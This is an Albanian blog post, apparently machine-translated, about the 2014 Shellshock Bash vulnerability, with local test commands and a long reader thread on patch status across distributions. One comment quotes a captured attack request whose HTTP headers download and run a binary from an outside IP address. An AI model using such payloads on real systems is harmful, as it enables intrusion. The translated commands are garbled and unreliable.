Ajo shkon si zjarr në disa bloge, një lajm i botuar në blog sigurie de Red Hat në lidhje me një cenueshmëri të gjetur në Bash për shkak të keqpërdorimit të variablave globalë. Sipas lajmit origjinal:
“Vuln Dobësia është për shkak të faktit se ju mund të krijoni variabla të mjedisit me vlera të krijuara posaçërisht përpara se të telefononi bash shell. Këto variabla mund të përmbajnë kod që ekzekutohet sapo thirret shell. Emri i këtyre variablave të përpunuar nuk ka rëndësi, vetëm përmbajtja e tyre. Si rezultat, kjo dobësi është e ekspozuar në shumë kontekste, për shembull:
- Komanda e Forcës përdoret në konfigurimet sshd për të siguruar aftësi të kufizuara të ekzekutimit të komandës për përdoruesit e largët. Kjo e metë mund të përdoret për të shmangur atë dhe për të siguruar ekzekutimin arbitrar të komandës. Disa zbatime të Git dhe Subversion përdorin predha të tilla të kufizuara. Përdorimi i rregullt i OpenSSH nuk preket pasi përdoruesit tashmë kanë qasje në një tastierë.
- Serveri Apache duke përdorur mod_cgi ose mod_cgid preken nëse skripte CGI shkruhen si në bash, ose nënnivele të pjelljes. Nënivelet e tilla përdoren në mënyrë implicite nga sistemi / popen në C, nga os.system / os.popen në Python, nëse përdorni një sistem / shell shell në PHP (kur ekzekutohet në modalitetin CGI), dhe open / system në Perl (që varet nga vargu i komandës).
- Skriptet PHP të ekzekutuara me mod_php nuk preken edhe nëse luhen nënnivelet.
- Klientët DHCP thërrasin skenare shell për të konfiguruar sistemin, me vlerat e marra nga një server potencialisht i dëmshëm. Kjo do të lejojë që komandat arbitrare të ekzekutohen, zakonisht si root, në makinën e klientit DHCP.
- Daemonët dhe programet e ndryshme me privilegjet SUID mund të ekzekutojnë skriptet e shell me vlerat e ndryshueshme të mjedisit të vendosura / ndikuara nga përdoruesi, të cilat do të lejonin ekzekutimin e komandave arbitrare.
- Çdo aplikacion tjetër që lidhet me një predhë ose ekzekuton një skenar shell si përdorimi i bash si një përkthyes. Skriptet e Shell-it që nuk eksportojnë variabla nuk janë të prekshëm ndaj këtij problemi, edhe nëse ato përpunojnë përmbajtje jo të besueshme dhe e ruajnë atë në hapen variablat e guaskës (majtas) dhe nënnivelet.
... "
Si të dimë nëse preket bash-i im?
Duke pasur parasysh këtë, ekziston një mënyrë shumë e thjeshtë për të ditur nëse prekemi nga kjo dobësi. Në fakt, unë kam testuar në Antergos tim dhe me sa duket nuk kam asnjë problem. Ajo që duhet të bëjmë është të hapim një terminal dhe të vendosim:
env x = '() {:;}; jehonë 'bash -c "e ndjeshme kjo është një provë"
Nëse del në këtë mënyrë, nuk kemi asnjë problem:
env x = '() {:;}; jehonë e ndjeshme 'bash -c "echo kjo është një provë" bash: paralajmërim: x: duke injoruar përpjekjen e përkufizimit të funksionit bash: gabim në përcaktimin e funksionit të importimit për "x" ky është një test
Nëse rezultati është i ndryshëm, duhet të përdorni kanalet e azhurnimit të shpërndarjeve tona të preferuara për të parë nëse ata kanë aplikuar tashmë patch-in. Kështu që ju e dini
Përditësuar: Ky është rezultati nga një bashkëpunëtor duke përdorur Ubuntu 14:04:
env x = '() {:;}; jehonë e ndjeshme 'bash -c "jehonë kjo është një provë" e pambrojtur kjo është një provë
Siç mund ta shihni, deri më tani është e prekshme.
Unë kam Kubuntu 14.04 nga 64 dhe gjithashtu marr:
env x = '() {:;}; jehonë 'bash -c "e ndjeshme kjo është një provë"
i prekshëm
ky eshte nje test
Unë tashmë e azhurnuar, por nuk korrigjohet. Çfarë të bëjmë?
Prisni që ata të azhurnohen. Tashmë eOS për shembull është azhurnuar ..
Sa e çuditshme, kam edhe Kubuntu 14.04
$ env x = '() {:;}; jehonë 'bash -c "e ndjeshme kjo është një provë"
bash: paralajmërim: x: injorimi i përpjekjes për përcaktimin e funksionit
bash: gabim gjatë përcaktimit të funksionit të importimit për "x"
ky eshte nje test
Unë shtoj se versioni i paketës "bash" që u shkarkua sot është:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
Në rastin tim, duke dhënë komandën, thjesht më jep sa vijon në terminal:
>
Sidoqoftë, shaka është se unë azhurnova Debian Wheezy dhe kjo është ajo që më hodhi poshtë.
Wheezy është akoma e prekshme nga pjesa e dytë e defektit, të paktën për pasdite (UTC -4: 30) problemi vazhdonte ende: /
Sapo verifikova që pasi aplikova një azhurnim këtë mëngjes, as Slackware, as Debian e as Centos nuk preken pasi morën një azhurnim përkatës.
Çfarë e bën Ubuntu ende të pambrojtur në këtë orë? Dhe më thuaj është e sigurt: D.
Por a keni provuar të azhurnoni Ubuntu?
Me azhurnimin e sotëm ata gjithashtu e kanë rregulluar atë.
OK
Ekspertët e sigurisë paralajmërojnë për cenueshmërinë e 'Bash', mund të përbëjë një kërcënim më të madh për përdoruesit e Softuerit Linux sesa e meta e Heartbleed, ku 'hakerat' mund të shfrytëzojnë një defekt në Bash për të marrë kontrollin e plotë të një sistemi.
Tod Beardsley, një menaxher inxhinierik në firmën e sigurisë kibernetike Rapid7, paralajmëroi se e meta u vlerësua me 10 për ashpërsinë e saj, që do të thotë se ka ndikim maksimal dhe u vlerësua "e ulët" për kompleksitetin e shfrytëzimit, domethënë e cila është relativisht e lehtë për sulmet "hacker" . Duke përdorur këtë dobësi, sulmuesit potencialisht mund të marrin kontrollin e sistemit operativ, të kenë qasje në informacione konfidenciale, të bëjnë ndryshime, etj. ", Tha Beardsley. "Kushdo me sisteme që zënë Bash duhet të zbatojë menjëherë patch", shtoi ai.
PARA KIST VULNERABILITETIT Q TH PREZANTON MJETIN E VJETR (GNU) aty ku është pritur Bach, do të ishte më e leverdishme që Linux Software të heqë qafe GNU dhe të ndryshojë për mjetin BSD.
PS: mos e censuroni lirinë time të shprehjes, ... mos fyeni askënd, ... mos e fshini mesazhin tim si mesazhin e mëparshëm që jam fshirë!
Oh të lutem, mos e tepro. Sa i urrej ata njerëz që përdorin BSD dhe përçmojnë GNU, Linux ose ndonjë gjë tjetër nga këto projekte.
Unë jam me ju dhe keni plotësisht të drejtë për ashpërsinë e kësaj vrime.
Nuk ishte censurë, ishte tepricë (ju kishit bërë të njëjtin koment në postimin e gnome 3.14)
«… Dhe vlerësuar si 'E ULT' P FORR KOMPLEKSITETIN e shfrytëzimit, që do të thotë se është relativisht E LEHT për sulmet e hakerëve
A vërehet papajtueshmëria?
Si mund të jetë e lehtë të shfrytëzosh cenueshmërinë dhe në të njëjtën kohë të kesh një nivel “të ulët” rreziku sepse është kaq kompleks për t’u përdorur?
Isshtë një gabim që u zgjidh brenda disa orësh nga takimi dhe që, si gjakderdhje, nuk ka raporte për shfrytëzim (natyrisht, ky ka më pak kohë për të njohur njëri-tjetrin).
Isshtë më shumë shtyp tabloid sesa rrezik real.
A ju duket e parëndësishme @Staff? Çfarë do të më thuash tani?
GET./.HTTP/1.0
.Agjenti i Përdoruesit: .Faleminderit-Rob
. Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
. Referuesi: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Pranoni :. * / *
$ skedar nginx
nginx: ELF 32-bit LSB i ekzekutueshëm, Intel 80386, version 1 (SYSV), i lidhur statikisht, për GNU / Linux 2.6.18, i zhveshur
$ md5 shuma nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256 shuma nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
A e dini se çfarë është? Për asgjë të rrezikshme ...
Situata është mjaft serioze, por nga atje për të thënë që duhet të ndaloni përdorimin e bash për një opsion BSD, tashmë është më së shumti, gjithsesi azhurnimi është tashmë atje, unë thjesht prek azhurnimin dhe asgjë tjetër.
Tani PD, mendoj se është më koleg @robet, nuk mendoj se këtu administratorët janë të përkushtuar në fshirjen e komenteve si kjo sepse po, pasi që kur kam marrë pjesë në këtë komunitet e kam pasur atë ndjenjë dhe shpresoj të mbetet ashtu mënyrë
Përshëndetje.
Ju vendosni të njëjtin koment saktësisht në dy postime të ndryshme. Nëse po përpiqeni të promovoni "burimin" e historisë, më falni, ky nuk është vendi.
Bash vjen nga Unix (dhe kloni i tij GNU). Sistemet e bazuara në BSD si OSX janë prekur gjithashtu, dhe sipas Genbeta, ata nuk e kanë rregulluar atë ende. Po kështu, për të hyrë në Bash ju duhet një llogari përdoruesi, qoftë lokale ose përmes SSH.
@ Stafi:
1.- Klasifikohet si Niveli 10 (niveli maksimal i rrezikut) për shkak të sasisë së shërbimeve që mund të preken nga meta. Në shënimin kryesor ata e bëjnë atë fakt shumë të qartë, duke argumentuar se defekt mund të ndikojë në shërbime të tilla si apache, sshd, programe me leje suid (xorg, ndër të tjera).
2.- Klasifikohet si Niveli i Ulët i Vështirësisë, kur bëhet fjalë për zbatimin e tij, dhe shembulli më i mirë i kësaj është skenari i testit të cenueshmërisë që @elav ka vendosur në post. Shumë e vështirë për tu zbatuar nuk është, siç mund ta shihni.
Unë nuk shoh tepricë në informacion (unë shoh vetëm një përkthim në Google) dhe nëse problemi është mjaft serioz, dhe siç thoni ju, ai tashmë ka një copë toke dhe një zgjidhje, por jo për këtë, nuk është më një rrezik, dhe një mjaft real.
@petercheco / @Yukiteru
Mos më keqinterpreto, mendoj se është e qartë që kritika ime është lajmi që Robet lidh dhe përqendrohet në mospërputhje dhe jo në një tepricë.
Në të njëjtën mënyrë, ne duhet të bëjmë dallimin midis rrezikut dhe rrezikut (nuk e përmend këtë të fundit), ne zakonisht i përdorim ato si sinonime, por këtu, rreziku do të ishte kapaciteti i dëmtimit të defektit dhe rreziku i probabilitetit të shfaqjes së tij.
Në rastin tim të veçantë, unë hyra nga dje. Nuk ishte për listat e postave ose diçka të ngjashme. Ishte për një distro desktop! Mora telefonin dhe i dërgova një mesazh sysadmin me lidhjen dhe konfirmova se kisha gjithçka të rregulluar, atëherë më falni por këto lajme nuk më mbajnë zgjuar.
Në forume të tjera ata përmendin në lidhje me cenueshmërinë Bash, "zgjidhja që Debian dhe Ubuntu lëshuan", por sot ata zbuluan se një cenueshmëri ekziston ende, kështu që zgjidhja ishte e paplotë, ata e përmendin atë!
Shoh që shumë më kanë kritikuar për faktin e thjeshtë të parandalimit të njerëzve nga ashpërsia e ndjeshmërisë - të kualifikuar me një nivel 10 të rrezikshmërisë maksimale, dhe përmendjen e zgjidhjeve të mundshme për Linux Software përpara mjetit të vjetëruar të GNU ku mbahet Bash - i cili në mënyrë të përsosur GNU mund të të zëvendësohet me mjetin BSD në Programin Linux,… Unë gjithashtu përdor Linux dhe më pëlqen Linux!
Unë sqaroj se Bash nuk vjen si parazgjedhje i instaluar në BSD, është një paketë më shumë e përputhshmërisë me Linux që mund të instalohet në BSD ... po!. Dhe burimi është vendosur në mënyrë që ata të mund të kontrollojnë lajmet, pasi që shumë nga përdoruesit ndonjëherë nuk e besojnë mesazhin ose komentin.
robet: Siç ju kanë thënë vazhdimisht, ju tashmë e vendosni komentin tuaj me lajmet në një postim, nuk keni pse ta vendosni në çdo postim që komentoni.
Në bash, ka predha të tjera që mund të përdoren në rast se Bash është i prekshëm. 😉
Robet, për të cilin di se nuk ka softuer që kombinon kernelin linux me tokën e përdorimit të BSD. Gjëja më e afërt është e kundërta, kBSD + GNU, siç bëjnë Gentoo dhe Debian. Për më tepër, GNU (1983) nuk mund të quhej "modë e vjetër" nëse është pas BSD (1977). Ata të dy ndajnë rrënjën e tyre unix (por jo kodin), nuk do të kishte "pajtueshmëri me Linux" nëse Bash do të krijohej kur Linus T ishte ende fëmijë.
uff, testimi i debianit në këtë kohë është "i prekshëm" se çfarë linje kemi ...
Unë përdor Debian Testing dhe madje edhe në këtë degë kemi marrë azhurnimin bash
sipas genbeta ekziston edhe një dobësi tjetër
http://seclists.org/oss-sec/2014/q3/685
komanda për tu konsultuar është
env X = '() {(a) => \' sh -c "jehonë e prekshme"; bash -c "echo Failure 2 unpatched"
e njejta une.
Njësoj edhe këtu. Por e meta origjinale në postim ishte rregulluar në (L) Ubuntu 14.04
Në vend që të bëni një jehonë të thjeshtë, përpiquni ta bëni atë të ekzekutojë një udhëzim që kërkon privilegje, unë hedh "privilegje të pamjaftueshme" ... ky defekt nuk përshkallëzon privilegjet?
Ke te drejte!! ato ishin dy dobësi ...
Për mua në Linux Mint 17 pas azhurnimit të dytë të bash që ata vendosën në depot e Ubuntu natën e kaluar, me ekzekutimin e kësaj komande, shell ofron këtë dalje:
env X = '() {(a) => \' sh -c "jehonë e prekshme"; bash -c "echo Fail 2 unpatched"
>
Versioni i "bassh" që u vendos në depot e Ubuntu për të azhurnuar ato të mëparshmet është:
4.3-7ubuntu1.2
Në sistemet e nxjerra nga Debian mund të kontrolloni versionin e instaluar me këtë komandë:
dpkg -s bash | grep Version
Në çdo rast, duhet të sqarohet, të paktën për përdoruesit e Debian, Ubuntu dhe Mint; Ju nuk duhet të shqetësoheni shumë për programet që ekzekutojnë skripta me kokën #! / Bin / sh sepse në ato shpërndarje / bin / sh nuk quan "bash", por lidhet me shell "dash" (vizatimi është :)
Console (pash) e Debian Alchemist është një tastierë e nxjerrë POSIX
e hirit.
.
Meqenëse ekzekuton skripta më shpejt se bash, dhe ka më pak varësi
bibliotekat (duke e bërë atë më të fortë kundër dështimeve të softuerit ose
hardware), përdoret si tastierë e paracaktuar e sistemit në sisteme
Debian
Pra, të paktën në Ubuntu, "bash" përdoret si një guaskë për hyrjen e përdoruesit (gjithashtu për përdoruesin rrënjë). Por çdo përdorues mund të përdorë një shell tjetër si parazgjedhje për përdoruesit dhe konsolët rrënjësorë (terminalet).
Easyshtë e lehtë të kontrollosh që shell ekzekuton skriptet (#! / Bin / sh) duke ekzekutuar këto komanda:
skedar / shportë / sh
(rezultati është / bin / sh: lidhje simbolike me "vizë") ne ndjekim gjurmën duke përsëritur komandën
skedar / shportë / vizë
(rezultati është / bin / dash: ELF 64-bit LSB objekt i përbashkët, x86-64, version 1 (SYSV) kështu që ky është i ekzekutueshmi.
Këto janë rezultatet në një shpërndarje Linux Mint 17. Në shpërndarjet e tjera jo të bazuara në Ubuntu / Debian ato mund të jenë të ndryshme.
Nuk është e vështirë të ndryshosh predhën e paracaktuar !! mund të përdorni edhe një tjetër për përdoruesit dhe për përdoruesin root. Në të vërtetë, ju thjesht duhet të instaloni predhën tuaj të preferuar dhe të ndryshoni parazgjedhjen me komandën "chsh" ose duke redaktuar skedarin / etc / passwd (megjithëse përdoruesit që nuk dinë pasojat e një gabimi kur redaktoni skedarin "passwd", ajo është më mirë të informoheni shumë mirë dhe para se ta redaktoni, bëni një kopje të origjinalit në rast se është e nevojshme ta rikuperoni atë).
Ndihem më mirë me "tcsh" (tcsh është :)
Konsola TENEX C, një version i përmirësuar i Berkeley csh
"Csh" është ajo që Mac OS X përdori disa vjet më parë. Diçka logjike duke marrë parasysh se pjesa më e madhe e sistemit operativ të Apple është kodi FreeBSD. Tani nga sa lexova dje, duket se ato ofrojnë gjithashtu "bash" për terminalet e përdoruesve.
P CONRFUNDIME:
- Versionet "bash" të arnuara "për shpërndarjet më të përdorura" janë shpërndarë tashmë
- Versioni "bash" 4.3-7ubuntu1.2 dhe më vonë nuk i përmban këto defekte
- Nuk është e detyrueshme të përdorni "bash" në OS * Linux
- Pak * shpërndarje Linux lidhin #! / Bin / sh me "bash"
- Ka alternativa: ash, dash, csh, tcsh dhe disa më shumë
- Nuk është e komplikuar të ndryshosh predhën e paracaktuar që sistemi thërret kur hap një terminal
- Pak pajisje të vogla (routerët dhe të tjerët) përdorin "bash", sepse është shumë i madh !!
Tani për tani sapo ka ardhur një azhurnim që instalon një version tjetër të "bash" 4.3-7ubuntu1.3
Për Linux Mint 17 dhe Ubuntu 14.04.1 LTS
ArchLinux hyri në versionin bash-4.3.026-1
@ Xurxo c .csh nga Berkeley?,… Ju kuptoni diçka nga ato që flas më sipër, dhe është më mirë të përdorni BSD "csh"… sesa mjetin e vjetër të GNU ku mbahet Bash. Ky mjet është më i miri për softuerin Linux.
Unë mendoj se kjo është e meta
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
e vertete?
Dhe cila do të ishte zgjidhja?
Prisni që ata të azhurnojnë paketën në distro your
Gabimi u pagëzua si goditje predhe
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
i prekshëm
ky eshte nje test
Asnjë patch ende për Ubuntu Studio 14.04
Riparuar në Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; jehonë 'bash -c "e ndjeshme kjo është një provë"
bash: paralajmërim: x: injorimi i përpjekjes për përcaktimin e funksionit
bash: gabim gjatë përcaktimit të funksionit të importimit për "x"
ky eshte nje test
Në të vërtetë është një dobësi e vogël, nëse ndikon tek ju është se keni qenë duke bërë diçka gabim më parë ...
Për shkak se një skenar bash që ekzekutohet me privilegje root nuk duhet të ekspozohet kurrë tek një përdorues. Dhe nëse ai kandidon pa privilegje, nuk ka një problem të tillë. Në të vërtetë, është marrëzi. Shumë frikësuese.
Unë mendoj të njëjtën gjë.
Pikërisht, për të shitur më shumë gazeta ose për të marrë më shumë vizita, këto mete janë të mira.
Por ata gjithmonë harrojnë të përmendin që për të shkelur një kompjuter me këtë lloj skripti, së pari duhet të keni qasje në bash dhe pastaj ta keni atë si root.
stafi nëse përdorni një apache me cgi, thjesht vendosni në headers http si cookies ose referues funksionin që dëshironi të ekzekutoni. Shtë përdorur madje për të përhapur krimba.
dhe nëse dikush vendos një guaskë në një server me një wget mishell.php, në atë rast nuk është serioze, apo jo?
Pajtohem me ju. Mendova se ishte një gabim i madh si Heartbleed (edhe NSA huazoi veten për të ushqyer sëmundshmërinë), por në fund të fundit ishte një defekt i vogël.
Ekzistojnë edhe të meta të tjera serioze, siç është konsumi i çmendur i Flash dhe rënia e performancës në Pepper Flash Player, dhe ai që tashmë është rregulluar ueb-RTC në Chrome dhe Firefox.
A e dini nëse ka një rregullim për njerëzit që kanë Linux Mint 16?
Në testimin e Debian tashmë ishte rregulluar.
Në 5 distrot e mia është zgjidhur, në OS X tim nuk e di.
Ju lutem mos censuroni komentin tim, unë thashë OS X. Nuk e di nëse mund të thuash OS X në këtë sit.
@yoyo mirë mos e çudit shumë se ata janë ende duke punuar në disa detaje të patch ... provoni këtë dhe pastaj më tregoni se si XD
env x = '() {:;}; echo i ndjeshëm 'bash -c "jehonë Unë jam më i prekshëm se iphone 6 plehra"
Se nëse e kanë zgjidhur 100% para OS X vë bast për ndonjë gjë
Epo, edhe në Ars Technica i japin rëndësi Bashit në OSX.
@Yoyo komenti tjetër në OS X për SPAM .. lla ju kurseni ..
@yoyo atje për të rregulluar citatet ... por pjesën tjetër ju e dini
FSF ka folur
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Ashtu si ata janë bërë patronizues me OSX (sepse OSX ende përdor Bash: v).
Sidoqoftë, nuk kam pse të ngatërrohem shumë me Debian Jessie.
Nëse sistemi është i prekshëm në Cent OS:
yum pastroni të gjithë && yum përditësimet bash
për të parë versionin bash:
rpm -qa | grep bash
Nëse versioni është më i hershëm se bash-4.1.2-15.el6_5.1, sistemi juaj mund të jetë i prekshëm!
Përshëndetje.
Dobësia e dytë nuk është zgjidhur ende
env amvariable2 = '() {(a) => \' sh -c "jehona e amulueshme"; bash -c "echo Failure 2 unpatched"
Po përditësohet ...
E kundërta më ndodh në Gentoo, unë jam vetëm e pambrojtur nga dështimi i parë, por me të dytën e marr këtë:
[kodi] sh: X: rreshti 1: gabim sintaksor pranë elementit të papritur `= '
sh: X: rreshti 1: "
sh: gabim në përcaktimin e funksionit të importimit për "X"
sh: i prekshëm: komanda nuk u gjet
Bug 2 nuk është rregulluar
[/ kodi]
Unë nuk e di nëse do të ketë tashmë një version të qëndrueshëm të Bash me të metat e rregulluara, por sido që të jetë do të jetë në pritje për herën tjetër kur të bëj një dalje - sync && emerge - update - thellë - me-bdeps = dhe - newuse @world (kështu hapi azhurnoj të gjithë sistemin).
Unë kam Gentoo me versionin 4.2_p50 dhe deri më tani i ka kaluar të gjitha testet. Provoni të dilni –sync dhe pastaj dilni –av1 app-shells / bash, dhe pastaj kontrolloni që keni versionin 4.2_p50 duke përdorur komandën bash –version.
E keni provuar këtë?
Dhe me paketa të reja, një provë e re që na ofron Red Hat
cd / tmp; rm -f / tmp / jehonë; env 'x = () {(a) => \' bash -c "data e jehonës"; mace / tmp / jehonë
Nëse sistemi ynë nuk është i prekshëm dhe është rregulluar në mënyrë korrekte, duhet të na japë diçka të tillë
Data 1
2 cat: / tmp / echo: Skedari ose direktoria nuk ekziston
Provoni në këtë mënyrë:
env X = '() {(a) => \' sh -c "jehonë e prekshme"; bash -c "echo Failure 2 patched"
unë marr
i prekshëm
Bug 2 i rregulluar.
Harrojeni, rreshti është formatuar keq.
Shkëlqyeshëm! Unë tashmë bëra azhurnimin e Slackware tim, faleminderit!
Përshëndetje, kam një pyetje, kam disa servera me 10 SITA "SUSE Linux Enterprise Server 64".
Kur ekzekutoj komandat, unë jam i prekshëm, unë jam edhe më i prekshëm se plehrat e iPhone 6 xD
Nëse nuk gaboj të azhurnoj / instaloj paketat në SUSE bëhet me komandën «zypper».
Në disa servera më tregon këtë:
BIAL: ~ # zypper lart
-bash: zypper: komanda nuk u gjet
BIAL: ~ #
Dhe në të tjerët kjo:
SMB: ~ # zypper lart
Rivendosja e burimeve të sistemit
Analizimi i meta të dhënave për SUSE Linux Enterprise Server 10 SP2-20100319-161944
Analizimi i bazës së të dhënave RPM ...
përmbledhje:
Asgje per te bere.
Cfare bej une
Unë e di që disa thonë se cenueshmëria është më e vogël se ajo që ata e pikturojnë, por unë e kam atë dhe nuk dua të ekspozohem ndaj rrezikut, qoftë i vogël apo i madh.
Përshëndetje.
Mirëmbrëma, unë kam provuar të ngjis kodin që keni dhënë në artikull, e kuptoj këtë
sanders @ pc-sanders: ~ $ env x = '() {:;}; jehonë 'bash -c "e ndjeshme kjo është një provë"
ky eshte nje test
sanders @ pc-sanders: ~ $
Ju lutem më shpjegoni se si ta rregulloj distro, unë bëj përditësime çdo ditë dhe nuk shoh ndryshime në prodhimin e promptit.
Thank you very much!